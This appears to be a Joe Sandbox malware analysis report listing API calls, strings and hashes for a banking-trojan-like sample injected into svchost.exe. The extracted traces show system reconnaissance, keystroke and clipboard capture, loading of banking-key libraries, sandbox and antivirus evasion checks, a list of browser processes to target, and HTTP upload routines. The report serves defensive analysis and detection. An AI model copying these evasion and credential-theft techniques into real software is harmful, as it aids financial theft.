WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D01
GetDateFormatA.KERNEL32(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 02C74D1B
WriteFile.KERNEL32(00000000,{Date: ,00000007,02C73EFD,00000000), ref: 02C74D31
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74D5A
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74D6C
GetTimeFormatA.KERNEL32(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 02C74D86
WriteFile.KERNEL32(00000000,{Local time: ,0000000D,02C73EFD,00000000), ref: 02C74D9C
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74DC1
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74DD3
GetTimeZoneInformation.KERNELBASE(?), ref: 02C74DDC
_snprintf.MSVCRT ref: 02C74E3D
WriteFile.KERNEL32(00000000,{GMT: ,00000006,02C73EFD,00000000), ref: 02C74E56
WriteFile.KERNEL32(00000000,?,?,02C73EFD,00000000), ref: 02C74E7B
WriteFile.KERNEL32(00000000,02CB3B50,00000002,02C73EFD,00000000), ref: 02C74E8D
WriteFile.KERNEL32(00000000,{Uptime: ,00000009,02C73EFD,00000000), ref: 02C74E9F
WriteFile.KERNEL32(00000000,00000000,?,02C73EFD,00000000), ref: 02C74ECF
WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74EE1
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C74EEF
WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,?,00000000), ref: 02C74F05
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02C74F2A
WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74F3C
WriteFile.KERNEL32(00000000,{Administrator: ,00000010,?,00000000), ref: 02C74F4E
IsUserAnAdmin.SHELL32 ref: 02C74F50
IsUserAnAdmin.SHELL32 ref: 02C74F73
WriteFile.KERNEL32(00000000,true,02C73EFD,?,00000000), ref: 02C74F95
WriteFile.KERNEL32(00000000,02CB3B50,00000002,?,00000000), ref: 02C74FA7
GetHandleInformation.KERNEL32(00000000,02C73EFD,00000000,00000000), ref: 02C74FCD
CloseHandle.KERNEL32(00000000), ref: 02C74FDE

Strings

{Screen: , xrefs: 02C74CC1
{BotVer: , xrefs: 02C74A6D
true, xrefs: 02C74F58, 02C74F7B
{Uptime: , xrefs: 02C74E96
{Administrator: , xrefs: 02C74F45
{GMT: , xrefs: 02C74E4D
4.0.1, xrefs: 02C74A7F
dd:MMM:yyyy, xrefs: 02C74D0F
false, xrefs: 02C74F5F, 02C74F82, 02C74F90
{Local time: , xrefs: 02C74D93
{Processor: , xrefs: 02C74B7C
{Language: , xrefs: 02C74C3C
PROCESSOR_IDENTIFIER, xrefs: 02C74B6A
{Windows directory: , xrefs: 02C74EFC
XXX, xrefs: 02C74C47, 02C74C5E
HH:mm:ss, xrefs: 02C74D7A
{Process: , xrefs: 02C74AB6
%dx%d@%d, xrefs: 02C74CA0
{Username: , xrefs: 02C74B16
%c%d:%02d, xrefs: 02C74E32
{Date: , xrefs: 02C74D28

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: File$Write$System$User$AdminFormatHandleInformationMetricsNameTime_snprintf$CapsCloseCreateDateDefaultDeviceDirectoryEnvironmentLangModuleVariableWindowsZonememset
String ID: %c%d:%02d$%dx%d@%d$4.0.1$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
API String ID: 113499719-3279427369
Opcode ID: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
Instruction ID: b2fa6146e9022246d4178943fe94a64be024fc2ff43f79197264d154892d7f77
Opcode Fuzzy Hash: 9054499f4fa11f2e0f0240a636c2edd1570574cf3f9fc0559508981e89958fbe
Instruction Fuzzy Hash: 1D226DB1D40218FEEB16DFA4CC89EEEBB7DEF45700F10459AB246A7141E6B45B48CB60

Function 02C844F0 Relevance: 110.5, APIs: 42, Strings: 21, Instructions: 296
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02C84511
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,7622F550,75AF7390,76230A60), ref: 02C84527
AddVectoredExceptionHandler.KERNEL32(00000001,02C73940), ref: 02C84534
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C8454F
CreateThread.KERNEL32(00000000,00000000,Function_00019230,00000000,00000000,00000000), ref: 02C84569
GetHandleInformation.KERNEL32(00000000,?), ref: 02C84581
CloseHandle.KERNEL32(00000000), ref: 02C84592
InitializeCriticalSection.KERNEL32(02CBD870), ref: 02C845A3
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845B9
GetProcAddress.KERNEL32(00000000,GetClipboardData), ref: 02C845CB
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C845EA
GetProcAddress.KERNEL32(00000000,TranslateMessage), ref: 02C845F8
GetProcAddress.KERNEL32(00000000,GetMessageA), ref: 02C84614
GetProcAddress.KERNEL32(00000000,GetMessageW), ref: 02C84630
InitializeCriticalSection.KERNEL32(02CBD858), ref: 02C8464B
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 02C84652
GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 02C84662
GetCurrentProcessId.KERNEL32(00000000,02C76A30,02CC7BA8), ref: 02C84678
GetCurrentThreadId.KERNEL32 ref: 02C84693
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C846A8
GetUserObjectInformationA.USER32(00000000), ref: 02C846AF
lstrcmpiA.KERNEL32(?,7d2de3ada), ref: 02C846C1
LoadLibraryExA.KERNEL32(user32.dll,00000000,00000000), ref: 02C846DB
GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 02C846EB
GetCurrentProcessId.KERNEL32(00000000,02C7ABD0,02CBCC94), ref: 02C84701
GetCurrentThreadId.KERNEL32 ref: 02C84710
GetThreadDesktop.USER32(00000000,00000002,?,00000100,?), ref: 02C84725
GetUserObjectInformationA.USER32(00000000), ref: 02C8472C
lstrcmpiA.KERNEL32(?,7d2de3ada), ref: 02C8473E
StrStrIA.SHLWAPI(00000000,java), ref: 02C84772
StrStrIA.SHLWAPI(00000000,.exe), ref: 02C84784
LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02C8479D
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02C847AB
GetProcAddress.KERNEL32(00000000,gethostbyname), ref: 02C847C7
GetProcAddress.KERNEL32(00000000,inet_addr), ref: 02C847E3
InitializeCriticalSection.KERNEL32(02CBD840), ref: 02C847FE
LoadLibraryExA.KERNEL32(sks2xyz.dll,00000000,00000000), ref: 02C8482B
GetProcAddress.KERNEL32(00000000,vb_pfx_import), ref: 02C84837
LoadLibraryExA.KERNEL32(FilialRCon.dll,00000000,00000000), ref: 02C84856
GetProcAddress.KERNEL32(00000000,RCN_R50Buffer), ref: 02C84862
LoadLibraryExA.KERNEL32(mespro.dll,00000000,00000000), ref: 02C84881
GetProcAddress.KERNEL32(00000000,AddPSEPrivateKeyEx), ref: 02C8488D

Strings

vb_pfx_import, xrefs: 02C84831
java, xrefs: 02C84766
getaddrinfo, xrefs: 02C847A5
.exe, xrefs: 02C84778
ntdll.dll, xrefs: 02C8464D
inet_addr, xrefs: 02C847DD
GetClipboardData, xrefs: 02C845C5
gethostbyname, xrefs: 02C847C1
GetMessageW, xrefs: 02C8462A
TranslateMessage, xrefs: 02C845F2
ZwQuerySystemInformation, xrefs: 02C8465C
user32.dll, xrefs: 02C845B4, 02C845E5, 02C846D6
sks2xyz.dll, xrefs: 02C84826
FilialRCon.dll, xrefs: 02C84851
SetThreadDesktop, xrefs: 02C846E5
ws2_32.dll, xrefs: 02C84798
AddPSEPrivateKeyEx, xrefs: 02C84887
7d2de3ada, xrefs: 02C846B5, 02C84732
GetMessageA, xrefs: 02C8460E
mespro.dll, xrefs: 02C8487C
RCN_R50Buffer, xrefs: 02C8485C

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$Thread$Current$CriticalHandleInformationInitializeSection$CreateDesktopModuleObjectProcessUserlstrcmpi$CloseExceptionFileHandlerMutexNameVectoredmemset
String ID: .exe$7d2de3ada$AddPSEPrivateKeyEx$FilialRCon.dll$GetClipboardData$GetMessageA$GetMessageW$RCN_R50Buffer$SetThreadDesktop$TranslateMessage$ZwQuerySystemInformation$getaddrinfo$gethostbyname$inet_addr$java$mespro.dll$ntdll.dll$sks2xyz.dll$user32.dll$vb_pfx_import$ws2_32.dll
API String ID: 1248150503-1381177144
Opcode ID: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
Instruction ID: 30f4eea14a0cac2fd906ffe96af7effc306e659fab77b5ce78b910cc3d23f5b5
Opcode Fuzzy Hash: 3e045128c3dfa6dc7d30af0499c5a6ae0fd0e9991d34ddc30372aca257b1a052
Instruction Fuzzy Hash: 9591A071BC035676FA2677B09C4AF9A676D9F80F49F1186A0F502F3080DBA5E6018A79

Function 02C839C0 Relevance: 72.1, APIs: 33, Strings: 8, Instructions: 323
memorynetworkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 02C839F2
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
_snprintf.MSVCRT ref: 02C83B38
HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
memset.MSVCRT ref: 02C83BF2
InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
HeapValidate.KERNEL32(00000000), ref: 02C83C3C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
HeapFree.KERNEL32(00000000), ref: 02C83C4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
HeapValidate.KERNEL32(00000000), ref: 02C83C5D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
HeapFree.KERNEL32(00000000), ref: 02C83C6D
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
CloseHandle.KERNEL32(00000000), ref: 02C83C94

Strings

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
325b0ba3454dc65e, xrefs: 02C83B22
POST, xrefs: 02C83ABD, 02C83AD3
Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
GET, xrefs: 02C83AB6
Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
Referer: http://www.google.com, xrefs: 02C83B14
HTTP/1.0, xrefs: 02C83ACD

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Http$ProcessRequest$FileHeadersInternet$FreeHandleOpenValidatememset$AllocateCloseConnectCreateInfoInformationQueryReadSendWrite_snprintf
String ID: 325b0ba3454dc65e$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
API String ID: 2233330183-3557604321
Opcode ID: 96ad48ba908256527a398daa973226683fba8ef25ca08c025694212504682693
Instruction ID: e9e0518cfa772f2fcc0f91f2f8754f9ff787320be5ffe8050f190806518866ff
Opcode Fuzzy Hash: 96ad48ba908256527a398daa973226683fba8ef25ca08c025694212504682693
Instruction Fuzzy Hash: A6B1FC71A402946BDB11EF64DC89FEF7B78EF48F18F104598FA05A7180D770AA44CBA4

Function 02C73940 Relevance: 65.3, APIs: 24, Strings: 13, Instructions: 538
threadmemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C739EC
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A17
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C73A3E
VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004,?), ref: 02C73A9F
SymSetOptions.DBGHELP(00000006), ref: 02C73AB4
GetCurrentProcess.KERNEL32(00000000,00000001), ref: 02C73AC4
SymInitialize.DBGHELP(00000000), ref: 02C73AC7
GetCurrentProcess.KERNEL32(?,00000000), ref: 02C73B05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,main,00000000,?), ref: 02C73B90
_snprintf.MSVCRT ref: 02C73BAE
GetCurrentThread.KERNEL32 ref: 02C73C44
ZwQueryInformationThread.NTDLL(00000000), ref: 02C73C4B
GetCurrentProcess.KERNEL32(?,?), ref: 02C73C88

Strings

main, xrefs: 02C73B57
dd;MMM;yyyy, xrefs: 02C73DED
ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X, xrefs: 02C73BA7
HH;mm;ss, xrefs: 02C73E12
ThreadStart = , xrefs: 02C73C60
debug_%s_%s.log, xrefs: 02C73E34
CallStack:, xrefs: 02C73CBD
ExceptionAddress = , xrefs: 02C73AD4
DEBUG, xrefs: 02C73FAD
scr.bmp, xrefs: 02C73F58
csm, xrefs: 02C73965
sysinfo.log, xrefs: 02C73ED8
Self exception = TRUE, xrefs: 02C73BF8

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CurrentQueryVirtual$Process$Thread$AllocErrorInformationInitializeLastOptions_snprintf
String ID: CallStack:$ExceptionCode = 0x%08XLast error: 0x%08XContext:Eip = 0x%08X Eax = 0x%08X Ebx = 0x%08XEcx = 0x%08X Edx = 0x%08X Ebp = 0x%08XEsp = 0x%08X Esi = 0x%08X Edi = 0x%08XEFlags = 0x%08XMain module:%s 0x%08X-0x%08X$Self exception = TRUE$ThreadStart = $DEBUG$ExceptionAddress = $HH;mm;ss$csm$dd;MMM;yyyy$debug_%s_%s.log$main$scr.bmp$sysinfo.log
API String ID: 3375037927-1369666974
Opcode ID: ac3fec414610f6108b4739e17ac95429ad56976481f4b4802917928903d1c8c8
Instruction ID: 506229e922478522f59c4e797cef5f4b2d10b56b102a1ea82a7b136c19998999
Opcode Fuzzy Hash: ac3fec414610f6108b4739e17ac95429ad56976481f4b4802917928903d1c8c8
Instruction Fuzzy Hash: 6622C470E406859FDB15CF68C894BAABBF5FF89300F2486D9E949EB340D731AA45CB50

Function 00402C10 Relevance: 64.9, APIs: 28, Strings: 9, Instructions: 157
librarywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00402C21
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402C35

Part of subcall function 00403900: RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
Part of subcall function 00403900: RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
Part of subcall function 00403900: RegCloseKey.ADVAPI32(?), ref: 00403973
Part of subcall function 00403900: GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
Part of subcall function 00403900: CharUpperA.USER32(?), ref: 004039C6
Part of subcall function 00403900: strstr.MSVCRT ref: 004039DE
Part of subcall function 00403900: strstr.MSVCRT ref: 004039F7
Part of subcall function 00403900: strstr.MSVCRT ref: 00403A10
Part of subcall function 00403900: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
Part of subcall function 00403900: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
Part of subcall function 00403900: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87

ExitProcess.KERNEL32 ref: 00402C46
FindWindowA.USER32(____AVP.Root,00000000), ref: 00402C5D
GetTickCount.KERNEL32 ref: 00402C69
PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402C7B
IsUserAnAdmin.SHELL32 ref: 00402C9B
ExitProcess.KERNEL32 ref: 00402CAC

Strings

user32.dll, xrefs: 00402C1C
Fri Jun 17 05:52:09 20112, xrefs: 00402D86, 00402D96, 00402DE8, 00402DF8
explorer.exe, xrefs: 00402DC2, 00402DC7, 00402E24, 00402E29
____AVP.Root, xrefs: 00402C58
IsWow64Process, xrefs: 00402CDD
Pn7w, xrefs: 00402DB1, 00402E13
winlogon.exe, xrefs: 00402DBB, 00402E1D
\apppatch\, xrefs: 00402D06, 00402D56
kernel32.dll, xrefs: 00402CC5

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
String ID: Fri Jun 17 05:52:09 20112$IsWow64Process$Pn7w$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
API String ID: 3353599405-700788231
Opcode ID: 3c08cf3795012a32fe98e21dd2af2de8b387599ae1b272b10eb404c49b26478c
Instruction ID: a8c301d2fd554ff8a4c2a18cdd62ad6e0f77d76d1eb59a281ca00d7aee5c603c
Opcode Fuzzy Hash: 3c08cf3795012a32fe98e21dd2af2de8b387599ae1b272b10eb404c49b26478c
Instruction Fuzzy Hash: FC515EB1640201A7EB1077B1EF0EB5B3668AF94B45F10413ABB05B61E1EBFC8D4586AD

Function 00403900 Relevance: 47.4, APIs: 15, Strings: 12, Instructions: 134registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403940
RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403965
RegCloseKey.ADVAPI32(?), ref: 00403973
RegCloseKey.ADVAPI32(?), ref: 0040397F
GetUserNameA.ADVAPI32(?,00000104), ref: 004039B9
CharUpperA.USER32(?), ref: 004039C6
strstr.MSVCRT ref: 004039DE
strstr.MSVCRT ref: 004039F7
strstr.MSVCRT ref: 00403A10
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403A29
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403A4D
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403A87
StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403A9F
StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403AB1
StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403AC3

Strings

HARDWARE\DESCRIPTION\System, xrefs: 00403915
M, xrefs: 00403997
U, xrefs: 004039A0
E, xrefs: 0040398E
Q, xrefs: 00403985
MALNETVM, xrefs: 004039F1
\cwsandbox\, xrefs: 00403AA5
SANDBOX, xrefs: 004039D8
\sandbox\, xrefs: 00403AB7
\sand-box\, xrefs: 00403A93
VIRUSCLONE, xrefs: 00403A0A
SystemBiosVersion, xrefs: 0040395B

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
API String ID: 1431998568-3499098167
Opcode ID: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
Instruction ID: c92bd0b18e501642bc8da1a15e04f066bbee5c1b1fab61bbe3854025ca4dfe5f
Opcode Fuzzy Hash: 3b908be20d57cd3dc64100d28935cd3b8a2d2fe8bb1a9ff6224eef881bebb134
Instruction Fuzzy Hash: 8741D8B1A50218A7DB20DB90CD4AFEF7B7C9B94705F1440AAE744B51C0D7B99B84CFA8

Function 02C888F0 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 161threadnetworkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 02C8895E
ExitThread.KERNEL32 ref: 02C8896E
socket.WS2_32(00000002,00000001,00000006), ref: 02C8897A
ExitThread.KERNEL32 ref: 02C8898D

Strings

login, xrefs: 02C88903
pass, xrefs: 02C88924

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: ExitThread$Startupsocket
String ID: login$pass
API String ID: 1705285421-2248183487
Opcode ID: 0814016945f0639cc30ea48f27b4ddf5a410ef03c0ada2c7d2801af701cddf6e
Instruction ID: f33e156e8bc8c7f92e80d3e6d955723e872460550b0affbafca1c6be28475b8d
Opcode Fuzzy Hash: 0814016945f0639cc30ea48f27b4ddf5a410ef03c0ada2c7d2801af701cddf6e
Instruction Fuzzy Hash: D451AE75984340AFC302DF64E888B6ABBE8FF88724F448B1DF965972C0D7709519CB62

Function 02C864A0 Relevance: 40.8, APIs: 27, Instructions: 290memorytimesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02C86370: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02C86384
Part of subcall function 02C86370: Process32First.KERNEL32(00000000,?), ref: 02C863A9
Part of subcall function 02C86370: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02C863CD
Part of subcall function 02C86370: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|,?,?,00000000), ref: 02C863E7
Part of subcall function 02C86370: EnterCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C8640B
Part of subcall function 02C86370: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02C86411
Part of subcall function 02C86370: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02C86418
Part of subcall function 02C86370: LeaveCriticalSection.KERNEL32(02CBD8A0,?,00000000), ref: 02C86446
Part of subcall function 02C86370: Process32Next.KERNEL32(00000000,00000128), ref: 02C8645A
Part of subcall function 02C86370: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02C86474
Part of subcall function 02C86370: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02C86485

OpenProcess.KERNEL32 ref: 02C86510
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86534
GetHandleInformation.KERNEL32(00000000,?), ref: 02C86558
CloseHandle.KERNEL32(00000000), ref: 02C8656A
EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86575
LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86594
OpenProcess.KERNEL32(?,00001400,?), ref: 02C86610
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C86631
GetHandleInformation.KERNEL32(00000000,FFFFFFFF), ref: 02C86655
CloseHandle.KERNEL32(00000000), ref: 02C86667
EnterCriticalSection.KERNEL32(02CBD8A0), ref: 02C86672
LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C86698
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C866E6
VirtualQuery.KERNEL32(02C93910,?,0000001C), ref: 02C86731
EnterCriticalSection.KERNEL32(02CBD8A0,?,?), ref: 02C86770
GetProcessHeap.KERNEL32(00000008,00000010), ref: 02C8677A
HeapAlloc.KERNEL32(00000000), ref: 02C86781
OpenProcess.KERNEL32(?,00001400,?), ref: 02C867D0
GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02C867F3
GetHandleInformation.KERNEL32(?,00001400), ref: 02C8681B
CloseHandle.KERNEL32(?), ref: 02C8682D
LeaveCriticalSection.KERNEL32(02CBD8A0), ref: 02C8684D
GetProcessHeap.KERNEL32(00000000,?), ref: 02C8687A
HeapValidate.KERNEL32(00000000), ref: 02C86881
GetProcessHeap.KERNEL32(00000000,?), ref: 02C8688D
HeapFree.KERNEL32(00000000), ref: 02C86894
Sleep.KERNEL32(00000032), ref: 02C868A0

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CriticalHandleHeapSection$CloseEnterInformationLeave$OpenTimes$Process32QueryVirtual$AllocAllocateCreateCurrentFirstFreeNextSleepSnapshotToolhelp32Validate
String ID:
API String ID: 1780642658-0
Opcode ID: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
Instruction ID: c6614f8cda1026375bc89473445eaafcaf29e54397b90c84eaf1897da800079e
Opcode Fuzzy Hash: b5554ce6a6e97e970ca9dc0c4d7c248bb66e36c801cb0225fb34d715afcd3c88
Instruction Fuzzy Hash: 83C1E5B0948391AFD321DF65C884A5AFBE8BFC8B14F208A5EF59A87240D770D545CF92

